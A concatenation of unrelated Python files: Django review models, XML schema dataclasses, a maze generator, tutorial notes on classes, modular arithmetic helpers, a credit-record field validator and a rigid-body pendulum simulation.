timestamp = models.DateTimeField(auto_now_add=True)
photo = models.ImageField(blank=True, null=True,
upload_to='company_photos/')
def __str__(self):
return '{company_name}'.format(company_name=self.name)
def filtered_set(self,type):
return Company.objects.all.filter(type=type)
class Review(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
company = models.ForeignKey(Company, on_delete=models.CASCADE)
rating = IntegerRangeField(max_value=5, min_value=1)
comment = models.CharField(max_length=300, verbose_name='Comment :')
timestamp = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{user} on {company}'.format(user=self.user, company=self.company)
|
# Copyright 2022 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This software is provided as-is,
# without warranty or representation for any use or purpose.
# Your use of it is subject to your agreement with Google.
from dataclasses import field
from decimal import Decimal
from pydantic.dataclasses import dataclass
from typing import List, Optional
from xsdata.models.datatype import XmlDateTime
@dataclass
class AddressType:
address: Optional[str] = field(
default=None,
metadata={
"name": "Address",
"type": "Element",
"namespace": "",
"required": True,
},
)
city: Optional[str] = field(
default=None,
metadata={
"name": "City",
"type": "Element",
"namespace": "",
"required": True,
},
)
region: Optional[str] = field(
default=None,
metadata={
"name": "Region",
"type": "Element",
"namespace": "",
"required": True,
},
)
postal_code: Optional[str] = field(
default=None,
metadata={
"name": "PostalCode",
"type": "Element",
"namespace": "",
"required": True,
},
)
country: Optional[str] = field(
default=None,
metadata={
"name": "Country",
"type": "Element",
"namespace": "",
"required": True,
},
)
customer_id: Optional[str] = field(
default=None,
metadata={
"name": "CustomerID",
"type": "Attribute",
},
)
@dataclass
class ShipInfoType:
ship_via: Optional[int] = field(
default=None,
metadata={
"name": "ShipVia",
"type": "Element",
"namespace": "",
"required": True,
},
)
freight: Optional[Decimal] = field(
default=None,
metadata={
"name": "Freight",
"type": "Element",
"namespace": "",
"required": True,
},
)
ship_name: Optional[str] = field(
default=None,
metadata={
"name": "ShipName",
"type": "Element",
"namespace": "",
"required": True,
},
)
ship_address: Optional[str] = field(
default=None,
metadata={
"name": "ShipAddress",
"type": "Element",
"namespace": "",
"required": True,
},
)
ship_city: Optional[str] = field(
default=None,
metadata={
"name": "ShipCity",
"type": "Element",
"namespace": "",
"required": True,
},
)
ship_region: Optional[str] = field(
default=None,
metadata={
"name": "ShipRegion",
"type": "Element",
"namespace": "",
"required": True,
},
)
ship_postal_code: Optional[str] = field(
default=None,
metadata={
"name": "ShipPostalCode",
"type": "Element",
"namespace": "",
"required": True,
},
)
ship_country: Optional[str] = field(
default=None,
metadata={
"name": "ShipCountry",
"type": "Element",
"namespace": "",
"required": True,
},
)
shipped_date: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "ShippedDate",
"type": "Attribute",
},
)
@dataclass
class CustomerType:
company_name: Optional[str] = field(
default=None,
metadata={
"name": "CompanyName",
"type": "Element",
"namespace": "",
"required": True,
},
)
contact_name: Optional[str] = field(
default=None,
metadata={
"name": "ContactName",
"type": "Element",
"namespace": "",
"required": True,
},
)
contact_title: Optional[str] = field(
default=None,
metadata={
"name": "ContactTitle",
"type": "Element",
"namespace": "",
"required": True,
},
)
phone: Optional[str] = field(
default=None,
metadata={
"name": "Phone",
"type": "Element",
"namespace": "",
"required": True,
},
)
fax: Optional[str] = field(
default=None,
metadata={
"name": "Fax",
"type": "Element",
"namespace": "",
},
)
full_address: Optional[AddressType] = field(
default=None,
metadata={
"name": "FullAddress",
"type": "Element",
"namespace": "",
"required": True,
},
)
customer_id: Optional[str] = field(
default=None,
metadata={
"name": "CustomerID",
"type": "Attribute",
},
)
@dataclass
class OrderType:
customer_id: Optional[str] = field(
default=None,
metadata={
"name": "CustomerID",
"type": "Element",
"namespace": "",
"required": True,
},
)
employee_id: Optional[str] = field(
default=None,
metadata={
"name": "EmployeeID",
"type": "Element",
"namespace": "",
"required": True,
},
)
order_date: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "OrderDate",
"type": "Element",
"namespace": "",
"required": True,
},
)
required_date: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "RequiredDate",
"type": "Element",
"namespace": "",
"required": True,
},
)
ship_info: Optional[ShipInfoType] = field(
default=None,
metadata={
"name": "ShipInfo",
"type": "Element",
"namespace": "",
"required": True,
},
)
@dataclass
class RootCustomers:
class Meta:
global_type = False
customer: List[CustomerType] = field(
default_factory=list,
metadata={
"name": "Customer",
"type": "Element",
"namespace": "",
},
)
@dataclass
class RootOrders:
class Meta:
global_type = False
order: List[OrderType] = field(
default_factory=list,
metadata={
"name": "Order",
"type": "Element",
"namespace": "",
},
)
@dataclass
class Root:
customers: Optional[RootCustomers] = field(
default=None,
metadata={
"name": "Customers",
"type": "Element",
"namespace": "",
"required": True,
},
)
orders: Optional[RootOrders] = field(
default=None,
metadata={
"name": "Orders",
"type": "Element",
"namespace": "",
"required": True,
},
)
|
from random import randrange, sample, shuffle
from time import sleep
from maze import constants
from maze.tile.passage import Passage
from maze.tile.wall import Wall
from maze.tile.exit import Exit
from maze.tile.tunnel import Tunnel
class MazeGenerator:
"""
Generator object for maze
"""
def __init__(self, w, h, window=None):
self.__grid = None
self.w = w
self.h = h
self.hMax = (2 * h) + 1
self.wMax = (2 * w) + 1
self.__window = window
def grid(self):
return self.__grid
def generate(self, animate=False):
"""
create a maze layout
"""
g = [[Wall() for c in range(self.wMax)] for r in range(self.hMax)]
grid = g
# random starting co-ords from 1 to index, multiples of 2
c_row = randrange(1, self.hMax, 2)
c_col = randrange(1, self.wMax, 2)
stack = [(c_row, c_col)]
grid[c_row][c_col] = Passage()
while stack:
(c_row, c_col) = stack[-1]
neighbours = self._get_neighbours(c_row, c_col, grid)
if len(neighbours) == 0:
# drop the current item from the stack
stack = stack[:-1]
else:
# carve passage in neighbour
n_row, n_col = neighbours[0]
grid[n_row][n_col] = Passage()
grid[(n_row + c_row) // 2][(n_col + c_col) // 2] = Passage()
stack += [(n_row, n_col)]
if animate:
self._render(grid)
sleep(0.05)
grid = self._carve_tunnels(grid)
if animate:
self._render(grid)
grid = self._cut_exit(grid)
if animate:
self._render(grid)
self.__window.enable_game()
self.__grid = grid
return grid
"""
internals
"""
def _get_neighbours(self, x, y, grid):
"""
get 'neighbouring' cells in a random order
"""
n_list = []
if x > 1 and grid[x - 2][y].get_type() == constants.maze_tile_wall:
n_list.append((x - 2, y))
if x < self.hMax - 2 and grid[x + 2][y].get_type() == constants.maze_tile_wall:
n_list.append((x + 2, y))
if y > 1 and grid[x][y - 2].get_type() == constants.maze_tile_wall:
n_list.append((x, y - 2))
if y < self.wMax - 2 and grid[x][y + 2].get_type() == constants.maze_tile_wall:
n_list.append((x, y + 2))
return sample(n_list, len(n_list))
def _cut_exit(self, grid):
"""
removes 1 square at random from the outer wall
"""
exit_options = []
exit_point = None
while not exit_point:
exit_options = self._generate_exit_options(exit_options)
shuffle(exit_options)
c_x, c_y, (t_x, t_y) = exit_options.pop()
d_x = c_x + t_x
d_y = c_y + t_y
# if this neighbour is empty, this is a valid exit
if grid[d_y][d_x].get_type() == constants.maze_tile_passage:
exit_point = (c_x, c_y)
e_x, e_y = exit_point
grid[e_y][e_x] = Exit()
return grid
def _carve_tunnels(self, grid):
# TODO
# ensure tunnels are a minimum distance from each other
# ensure tunnels don't block the exit route (?)
for i in [1,1,2,2]:
px, py = None, None
while not px and not py or grid[py][px].get_type() != constants.maze_tile_passage:
px, py = randrange(self.wMax), randrange(self.hMax)
grid[py][px] = Tunnel(i)
return grid
def _generate_exit_options(self, options):
"""
create randomised exit square list
"""
if len(options) != 0:
return options
else:
top_wall = (randrange(1, self.wMax, 2), 0, (0, 1))
left_wall = (0, randrange(1, self.hMax, 2), (1, 0))
bottom_wall = (randrange(1, self.wMax, 2), self.hMax - 1, (0, -1))
right_wall = (self.wMax - 1, randrange(1, self.hMax, 2), (-1, 0))
return [top_wall, left_wall, right_wall, bottom_wall]
def _render(self, grid):
display = []
for y, _ in enumerate(grid):
for x, _ in enumerate(grid[y]):
sq = grid[y][x]
display.append(sq.render_value())
display.append('\n')
maze = "".join(display)
if self.__window:
self.__window.update(maze)
else:
print(maze, flush=True)
if __name__ == "__main__":
m = MazeGenerator(10, 10)
maze = m.generate(True)
|
# SECTION 5
# 1. Revisiting the Differences between Methods and Functions
mylist = [1,2,3,4]
mylist.pop() # <- Method
print(mylist)
# -> [1,2,3]
mylist = [1,2,3]
max_number = max([1,2,3,4,100,900]) # <- Function
# mylist.max() -> this isn't a thing because max is a function
# error -> unresolved attribute reference 'max' for class 'list
print(max_number) # -> 900
def myname(name):
print("Hello " + name)
myname("Evan")
# 2. Classes and Objects
class Vehicle:
def __init__(self, body_type, make): # <- !!important!!
# specify the attributes of the vehicle here
self.vehicle_body = body_type # must use self to be able to use it on objects like car1 and car2
self.vehicle_make = make
car1 = Vehicle('Sedan', 'Toyota') # -> This is how you would initialize a vehicle
print(car1.vehicle_body)
print(car1.vehicle_make)
car2 = Vehicle('SUV', 'Subaru')
print(car2.vehicle_body)
print(car2.vehicle_make)
print(type(car1))
# -> <class '__main__.Vehicle'>
# 3. Classes Attributes vs Object Attributes
class NewVehicle:
# the color should not be changed outside of the class specification.
# this is a class attribute
color = 'red'
vehicle_counter = 0
def __init__(self, body_type, make): # <- !!important!!
# specify the attributes of the vehicle here
self.vehicle_body = body_type # must use self to be able to use it on objects like car1 and car2
self.vehicle_make = make
NewVehicle.vehicle_counter += 1
def get_vehicle_count(self):
return NewVehicle.vehicle_counter
car1 = NewVehicle('Sedan', 'Toyota') # -> This is how you would initialize a vehicle
print(car1.vehicle_body)
print(car1.vehicle_make)
car2 = NewVehicle('SUV', 'Subaru')
print(car2.vehicle_body)
print(car2.vehicle_make)
print(car1.vehicle_counter)
# 4. Calling Python Code That is saved in another file.
# in vehicle application file
|
import numpy as np
v1 = [np.random.randint(-1,2) for i in range(3)]
v2 = [np.random.randint(-1,2) for i in range(3)]
v = [v1, v2]
def i2pv(N, p):
v = []
i = 0
while p**i < abs(N):
v.append(N % p**i)
i += 1
if len(v) == 0:
v.append(0)
return v
return v
def addfr(v):
if v[0][3] == v[1][3]:
return add([v[0][:-1], v[1][:-1]]), v[0][3]
elif v[0][3] < v[1][3]:
return add([shift(*v[0][:-1], v[1][3] - v[0][3]), v[1][:-1]]), v[1][3]
elif v[0][3] > v[1][3]:
return add([shift(*v[1][:-1], v[0][3] - v[1][3]), v[0][:-1]]), v[0][3]
def shiftfr(a, b, c, i, j):
if j == 0:
return a, b, c, i
elif j == 1:
return 0, a, b, j + i
elif j == 2:
return 0, 0, a, i + j
elif j == 3:
return 0, 0, 0, i + j
def shift(a, b, c, j):
if j == 0:
return a, b, c
elif j == 1:
return 0, a, b
elif j == 2:
return 0, 0, a
elif j == 3:
return 0, 0, 0
def inversefr(a, b, c, i):
return inverse(a, b, c), -i
def inverse(a, b, c):
if a == 0:
raise ValueError("divisible by p")
elif a == 1:
return normal(1, -b, -c + b**2)
elif a == -1:
return normal(-1, -b, c + b**2)
def normal(a, b, c):
if abs(a) < 2:
return a, mod3(b), mod3(c)
elif a == 2:
return -1, mod3(b), mod3(c - 1)
elif a == -2:
return 1, mod3(b), mod3(c + 1)
def mod3(a):
return -1 if a % 3 == 2 else a % 3
def add(v):
v3 = []
for a, b in zip(v[0],v[1]):
v3.append(mod3(a + b))
return normal(v3[0], v3[1], v3[2])
def mul(v):
return [normal(mod3(v[0][0] * v[1][0]), mod3(v[0][0] * v[1][1] + v[0][1] * v[1][0]), mod3(v[0][0] * v[1][2] + v[0][1]*v[1][1] + v[0][2] * v[1][0]))]
|
from validators.subsystems import bscode
from datasetrecords import models
from validators.subsystems import checkstatus
from validators.subsystems import checkformat
from validators.subsystems import checkenforcements
from validators.subsystems.datasets import pivalidate
from validators.subsystems.datasets import ibvalidate
from validators.subsystems.datasets import validationstatus
from branchcode import models as branchcodemodels
class BSValidate(ibvalidate.IBValidate):
def __init__(self, code="BS"):
super(BSValidate, self).__init__(code=code)
self._model = models.BORROWERSTAKEHOLDER
self.all_records = self.filter_new_old_records(models.BORROWERSTAKEHOLDER)
self.headers = branchcodemodels.RequiredHeader.objects.all()
self.code = code
self.pi_c_code = bscode.BSCode(self._model, self.code)
self.set_code(self.pi_c_code)
def check_data_in_field(self, f, rules):
self.passed = { }
try:
if(f == "PI_Identification_Code"):
self.pass_pi = {}
self.by_id = {}
for records in self.all_records:
for r in rules:
if r == "M":
if(records.PI_Identification_Code.pi_identification_code):
self.passed[records.PI_Identification_Code.pi_identification_code]={"Mandatory":True}
else:
self.passed[records.PI_Identification_Code.pi_identification_code]={"Mandatory":False}
elif(isinstance(r, dict)):
for key in r:
self.first_priority = self.check_dict_values(r.get(key)[0])
self.second_priority = self.check_dict_values(r.get(key)[1])
if(self.first_priority == 1 or self.first_priority == 2):
self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.PI_Identification_Code.pi_identification_code, priority=r.get(key))
self.validation_first = self.vstatus.validate_field(records.PI_Identification_Code.pi_identification_code)
if(self.validation_first == True):
#Perform the second validation
self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.PI_Identification_Code.pi_identification_code, priority=r.get(key))
self.validation_second = self.sec_enf.validate_field(records.PI_Identification_Code.pi_identification_code, headers=self.headers)
if(self.validation_second == True):
self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=True
else:
self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=False
else:
self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=False
else:
self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.PI_Identification_Code.pi_identification_code, priority=r.get(key))
self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.PI_Identification_Code.pi_identification_code, priority=r.get(key))
self.validation_first = self.vstatus.validate_field(records.PI_Identification_Code.pi_identification_code)
self.validation_second = self.sec_enf.validate_field(records.PI_Identification_Code.pi_identification_code, headers=self.headers)
if(self.validation_first == True):
if(self.validation_second == True):
self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=True
else:
self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=False
else:
self.passed[records.PI_Identification_Code.pi_identification_code]["ENF"]=False
else:
if(records.PI_Identification_Code):
self.parseddata = records.PI_Identification_Code.pi_identification_code.replace("-", "", 10)
if(len(self.parseddata) <= 8):
self.passed[records.PI_Identification_Code.pi_identification_code]["FORMAT"]=True #checkformat.sub_alphanumeric(records.PI_Identification_Code.pi_identification_code.strip())
else:
self.passed[records.PI_Identification_Code.pi_identification_code]["FORMAT"]=False
else:
self.passed[str(records.PI_Identification_Code.pi_identification_code)]["FORMAT"]=False
yield self.passed
elif(f == "Branch_Identification_Code"):
self.pass_it = { }
for records in self.all_records:
for r in rules:
if r == "M":
if(records.Branch_Identification_Code.branch_code):
self.passed[records.Branch_Identification_Code.branch_code]={"Mandatory":True}
else:
self.passed[records.Branch_Identification_Code.branch_code]={"Mandatory":False}
elif(isinstance(r, dict)):
for key in r:
self.first_priority = self.check_dict_values(r.get(key)[0])
self.second_priority = self.check_dict_values(r.get(key)[1])
if(self.first_priority == 1 or self.first_priority == 2):
self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.Branch_Identification_Code.branch_code, priority=r.get(key))
self.validation_first = self.vstatus.validate_field(records.Branch_Identification_Code.branch_code)
if(self.validation_first == True):
#Perform the second validation
self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.Branch_Identification_Code.branch_code, priority=r.get(key))
self.validation_second = self.sec_enf.validate_field(records.Branch_Identification_Code.branch_code, headers=records.Branch_Identification_Code.branch_code)
if(self.validation_second == True):
self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=True
else:
self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=False
else:
self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.Branch_Identification_Code.branch_code, priority=r.get(key))
self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.Branch_Identification_Code.branch_code, priority=r.get(key))
self.validation_first = self.vstatus.validate_field(records.Branch_Identification_Code.branch_code)
self.validation_second = self.sec_enf.validate_field(records.Branch_Identification_Code.branch_code, headers=records.Branch_Identification_Code.branch_code)
if(self.validation_first == True):
if(self.validation_second == True):
self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=True
else:
self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=False
else:
self.passed[records.Branch_Identification_Code.branch_code]["ENF"]=False
else:
if(len(records.Branch_Identification_Code.branch_code) <= 15):
if(str(records.Branch_Identification_Code.branch_code).strip().lstrip().rstrip()):
self.passed[records.Branch_Identification_Code.branch_code]["FORMAT"]=checkformat.is_numeric(records.Branch_Identification_Code.branch_code)
else:
self.passed[records.Branch_Identification_Code.branch_code]["FORMAT"]=False
else:
self.passed[records.Branch_Identification_Code.branch_code]["FORMAT"]=False
yield self.passed
elif(f == "Borrowers_Client_Number"):
self.pass_in = {}
for records in self.all_records:
for r in rules:
if r == "M":
if(records.Borrowers_Client_Number.Client_Number):
self.passed[records.Borrowers_Client_Number.Client_Number]={"Mandatory":True}
else:
self.passed[records.Borrowers_Client_Number.Client_Number]={"Mandatory":False}
elif(isinstance(r, dict)):
for key in r:
self.first_priority = self.check_dict_values(r.get(key)[0])
self.second_priority = self.check_dict_values(r.get(key)[1])
if(self.first_priority == 1 or self.first_priority == 2):
self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.Borrowers_Client_Number.Client_Number, priority=r.get(key))
self.validation_first = self.vstatus.validate_field(records.Borrowers_Client_Number.Client_Number)
if(self.validation_first == True):
#Perform the second validation
self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.Borrowers_Client_Number.Client_Number, priority=r.get(key))
self.validation_second = self.sec_enf.validate_field(records.Borrowers_Client_Number.Client_Number, headers=self.headers)
if(self.validation_second == True):
self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=True
else:
self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=False
else:
self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=False
else:
self.vstatus = checkenforcements.check_enforcements(self.get_keys(r.get(key)[0]), self._model, records.Borrowers_Client_Number.Client_Number, priority=r.get(key))
self.sec_enf = checkenforcements.check_enforcements(self.get_keys(r.get(key)[1]), self._model, records.Borrowers_Client_Number.Client_Number, priority=r.get(key))
self.validation_first = self.vstatus.validate_field(records.Borrowers_Client_Number.Client_Number)
self.validation_second = self.sec_enf.validate_field(records.Borrowers_Client_Number.Client_Number, headers=self.headers)
if(self.validation_first == True):
if(self.validation_second == True):
self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=True
else:
self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=False
else:
self.passed[records.Borrowers_Client_Number.Client_Number]["ENF"]=False
else:
if(records):
if(len(records.Borrowers_Client_Number.Client_Number) <= 30):
self.passed[records.Borrowers_Client_Number.Client_Number]["FORMAT"]=True #checkformat.sub_alphanumeric(records.Client_Number)
else:
self.passed[records.Borrowers_Client_Number.Client_Number]["FORMAT"]=False
else:
self.passed[records.Borrowers_Client_Number.Client_Number]["FORMAT"]=False
yield self.passed
elif(f == "Stakeholder_Type"):
self.pass_lid = {}
for records in self.all_records:
for r in rules:
if r == "M":
if(records.Stakeholder_Type):
self.passed[records.Stakeholder_Type]={"Mandatory":True}
else:
self.passed[records.Stakeholder_Type]={"Mandatory":False}
elif(isinstance(r, dict)):
for key in r:
self.statuss = checkenforcements.check_enforcements(key, self._model, records.Stakeholder_Type, priority=r.get(key))
self.passed[records.Stakeholder_Type]["ENF"]=self.statuss.validate_field(records.Stakeholder_Type)
else:
if(records):
if(len(records.Stakeholder_Type) == 1):
self.passed[records.Stakeholder_Type]["FORMAT"]=checkformat.is_numeric(records.Stakeholder_Type)
else:
self.passed[records.Stakeholder_Type]["FORMAT"]=False
else:
self.passed[records.Stakeholder_Type]["FORMAT"]=False
yield self.passed
elif(f == "Stakeholder_Category"):
self.pass_lid = {}
for records in self.all_records:
for r in rules:
if r == "M":
if(records.Stakeholder_Category):
self.passed[records.Stakeholder_Category]={"Mandatory":True}
else:
self.passed[records.Stakeholder_Category]={"Mandatory":False}
elif(isinstance(r, dict)):
for key in r:
self.statuss = checkenforcements.check_enforcements(key, self._model, records.Stakeholder_Category, priority=r.get(key))
self.passed[records.Stakeholder_Category]["ENF"]=self.statuss.validate_field(records.Stakeholder_Category)
else:
if(records):
if(len(records.Stakeholder_Category) == 1):
self.passed[records.Stakeholder_Category]["FORMAT"]=checkformat.is_numeric(records.Stakeholder_Category)
else:
self.passed[records.Stakeholder_Category]["FORMAT"]=False
else:
self.passed[records.Stakeholder_Category]["FORMAT"]=False
yield self.passed
elif(f == "Shareholder_Percentage"):
self.pass_lid = {}
for records in self.all_records:
for r in rules:
if r == "M":
if(records.Shareholder_Percentage):
self.passed[records.Shareholder_Percentage]={"Mandatory":True}
else:
self.passed[records.Shareholder_Percentage]={"Mandatory":False}
elif(isinstance(r, dict)):
for key in r:
self.statuss = checkenforcements.check_enforcements(key, self._model, records.Shareholder_Percentage, priority=r.get(key))
self.passed[records.Shareholder_Percentage]["ENF"]=self.statuss.validate_field(records.Shareholder_Percentage)
else:
if(records):
if(len(records.Shareholder_Percentage) >= 1):
self.passed[records.Shareholder_Percentage]["FORMAT"]=checkformat.is_float(records.Shareholder_Percentage)
else:
self.passed[records.Shareholder_Percentage]["FORMAT"]=False
else:
self.passed[records.Shareholder_Percentage]["FORMAT"]=False
yield self.passed
except Exception as e:
# Log
pass
|
import os
os.chdir("C:\\Users\\Logan\\Desktop\\simEngine3D")
from pendulum_function import pendulum
import numpy as np
from constraints_in import constraints_in
from simEngine3D_dataload import data_file, DP1_PHI_partials,CD_PHI_partials,DP2_PHI_partials,D_PHI_partials, body
from simEngine3D_functions import build_p, build_A, calc_phi, calc_partials, build_ja,build_G,tilde,calc_nue,check_phi,calc_gamma,build_E,build_p_from_A,calc_partials_HW82
from simEngine3D_functions import calc_phi_HW82
import matplotlib.pyplot as plt
from new_partials import DP1_phi_parital_lagrange,CD_phi_parital_lagrange
import time as ttime
import time as ttime
tic=ttime.perf_counter()
# Read in body and constraint information
file="C:\\Users\\Logan\\Desktop\\simEngine3D\\HW8_P2_input.txt"
X=data_file(file)
constraint_list=constraints_in(file)
#
h=0.01
L=2
xa=0.05*0.05
volume=xa*L
rho=7800
m1=rho*volume
m2=rho*volume/2
counter=0
time_list=np.arange(0,200+h,h)
time=time_list[0]
#df=np.pi*np.sin(2*time)*np.cos((np.pi*np.cos(time*2))/4)*-1/2
#ddf=np.pi**2*np.sin(time*2)**2*np.sin((np.pi*np.cos(time*2))/4)*(-1/4)-np.pi*np.cos(time*2)*np.cos((np.pi*np.cos(time*2))/4)
df=0
ddf=0
nb=2
nc=len(constraint_list)
r_list=np.zeros([3*nb,len(time_list)])
r_d_list=np.zeros([3*nb,len(time_list)])
r_dd_list=[]
p_list=np.zeros([4*nb,len(time_list)])
p_d_list=np.zeros([4*nb,len(time_list)])
p_dd_list=[]
lambda_p_list=[]
lagrange_list=[]
F1=np.array([0,0,m1*-9.81])
F1.shape=(3,1)
F2=np.array([0,0,m2*-9.81])
F2.shape=(3,1)
F=np.zeros([6,1])
F[0:3]=F1
F[3:6]=F2
tau=np.array([0,0,0])
tau.shape=(3,1)
# set body j starting values
r_start=np.array([0,L,0])
A_start=np.zeros([3,3])
A_start[0,2]=np.cos(0)
A_start[1,0]=np.cos(0)
A_start[2,1]=np.cos(0)
p_start=build_p_from_A(A_start)
r_start.shape=(3,1)
p_start.shape=(4,1)
X[1].q[0:3]=r_start
X[1].q[3:]=p_start
X[1].A_rotation=build_A(X[1].q[3:])
X[1].r_dot=np.array([0,0,0])
X[1].p_dot=np.array([0,0,0,0])
r_start=np.array([0,2*L,-L/2])
A_start=np.zeros([3,3])
A_start[0,2]=np.cos(0)
A_start[1,1]=np.cos(0)
A_start[2,0]=np.cos(np.pi)
p_start=build_p_from_A(A_start)
r_start.shape=(3,1)
p_start.shape=(4,1)
X[2].q[0:3]=r_start
X[2].q[3:]=p_start
X[2].A_rotation=build_A(X[2].q[3:])
X[2].r_dot=np.array([0,0,0])
X[2].p_dot=np.array([0,0,0,0])
#
tol=1e-5
phi=calc_phi_HW82(X,constraint_list,0)
check_phi(X,constraint_list,0,tol)
PHI_P=np.zeros([2,1])
for i in range(1,len(X)):
PHI_P[i-1]=1/2*(X[i].q[3:].T @ X[i].q[3:]) - 1/2
if PHI_P.any() > tol:
print("initial conditions do not satisfy PHI_P=0")
else:
print("initial conditions satisfy PHI_P=0")
partials=calc_partials_HW82(X,constraint_list)
jacobian=np.vstack(partials)
phi_r=np.zeros([nc,6])
phi_r[:5,:]=jacobian[0:5,0:6]
phi_r[5:,:]=jacobian[5:,3:9]
#phi_p=jacobian[:,13:]
phi_p=np.zeros([nc,8])
phi_p[:5,:]=jacobian[0:5,9:17]
phi_p[5:,:]=jacobian[5:,13:]
r_list[0:3,0:1]=X[1].q[0:3]
r_list[3:6,0:1]=X[2].q[0:3]
p_list[0:4,0:1]=X[1].q[3:]
p_list[4:8,0:1]=X[2].q[3:]
for i in X:
i.r_dot.shape=(3,1)
i.p_dot.shape=(4,1)
r_d_list[0:3,0:1]=X[1].r_dot
r_d_list[3:6,0:1]=X[2].r_dot
p_d_list[0:4,0:1]=X[1].p_dot
p_d_list[4:10,0:1]=X[2].p_dot
nue=calc_nue(X,constraint_list,0)
check_nue=phi_r @ r_d_list[:,0] + phi_p @ p_d_list[:,0]
if (check_nue == nue).any():
print("initial conditions satisfy nue=0")
else:
print("initial conditions do not satisfy nue=0")
P=np.zeros([2,8])
P[0,0:4]=X[1].q[3:].T
P[1,4:8]=X[2].q[3:].T
check_P=P @ p_d_list[:,0]
if (check_P == np.array([0,0])).any():
print("initial conditions satisfy P_p_dot=0")
else:
print("initial conditions do not satisfy P_p_dot=0")
r_dd_list=[]
p_dd_list=[]
lambda_p_list=[]
lagrange_list=[]
nue_list=[]
#%%
partials=calc_partials_HW82(X,constraint_list)
jacobian=np.vstack(partials)
phi_r=np.zeros([nc,6])
phi_r[:5,:]=jacobian[0:5,0:6]
phi_r[5:,:]=jacobian[5:,3:9]
#phi_p=jacobian[:,13:]
phi_p=np.zeros([nc,8])
phi_p[:5,:]=jacobian[0:5,9:17]
phi_p[5:,:]=jacobian[5:,13:]
nue_values=calc_nue(X,constraint_list,df)
#phi_r=np.zeros([10,3*nb])
#phi_r[:,0:3]=jacobian[:,0:3] #get ri
#phi_r[:,3:6]=jacobian[:,3:6]
#
#phi_p=np.zeros([10,8])
#phi_p[:,0:4]=jacobian[:,6:10]
#phi_p[:,4:8]=jacobian[:,10:14]
gamma_values=calc_gamma(X,constraint_list,ddf)
M1=m1*np.identity(3)
M2=m2*np.identity(3)
M=np.zeros([6,6])
M[0:3,0:3]=M1
M[3:6,3:6]=M2
J_bar1=np.zeros([3,3])
b=0.05/2
c=0.05/2
J_bar1[0,0]=1/12*m1*(b**2+c**2)
J_bar1[1,1]=1/12*m1*(L**2+c**2)
J_bar1[2,2]=1/12*m1*(L**2+b**2)
J_bar2=np.zeros([3,3])
J_bar2[0,0]=1/12*m1*(b**2+c**2)
J_bar2[1,1]=1/12*m1*(L/2**2+c**2)
J_bar2[2,2]=1/12*m1*(L/2**2+b**2)
J_bar=[J_bar1,J_bar2]
G=[]
for i in range(1,len(X)):
G.append(build_G(X[i].q[3:]))
J_P_list=[]
for i in range(0,len(G)):
J_P_list.append(4*np.dot(np.dot(np.transpose(G[i]),J_bar[i]),G[i]))
J_P=np.zeros([8,8])
J_P[0:4,0:4]=J_P_list[0]
J_P[4:8,4:8]=J_P_list[1]
G_dot=[]
for i in range(1,len(X)):
G_dot.append(build_G(X[i].p_dot))
tau_hat_list=[]
for i in range(0,len(G_dot)):
tau_hat_list.append(8*np.dot(np.dot(np.dot(G_dot[i].T,J_bar[i]),G_dot[i]),X[i+1].q[3:]))
tau_hat=np.zeros([8,1])
tau_hat[0:4]=tau_hat_list[0]
tau_hat[4:8]=tau_hat_list[1]
P=np.zeros([2,8])
P[0,0:4]=X[1].q[3:].T
P[1,4:8]=X[2].q[3:].T
LHS=np.zeros([26,26])
LHS[0:6,0:6]=M
LHS[0:6,16:26]=phi_r.T
LHS[6:14,6:14]=J_P
LHS[6:14,14:16]=P.T
LHS[6:14,16:26]=phi_p.T
LHS[14:16,6:14]=P
LHS[16:26,0:6]=phi_r
LHS[16:26,6:14]=phi_p
RHS=np.zeros([26,1])
gamma_p=[]
for i in range(1,len(X)):
gamma_p.append(-2*np.dot(X[i].p_dot.T,X[i].p_dot)) #slide 473
RHS[0:6]=F
RHS[6:14]=tau_hat
RHS[14]=gamma_p[0]
RHS[15]=gamma_p[1]
gamma_hat=np.array(gamma_values) #remove eulear parameterization constraint
gamma_hat.shape=(10,1)
RHS[16:26]=gamma_hat
unknowns=np.dot(np.linalg.inv(LHS),RHS)
r_dd_list.append(unknowns[0:6])
p_dd_list.append(unknowns[6:14])
lambda_p_list.append(unknowns[14:16])
lagrange_list.append(unknowns[16:26])
#%%
n=1
time=time_list[n]
for ii in range(1,len(time_list)):
time=time_list[ii]
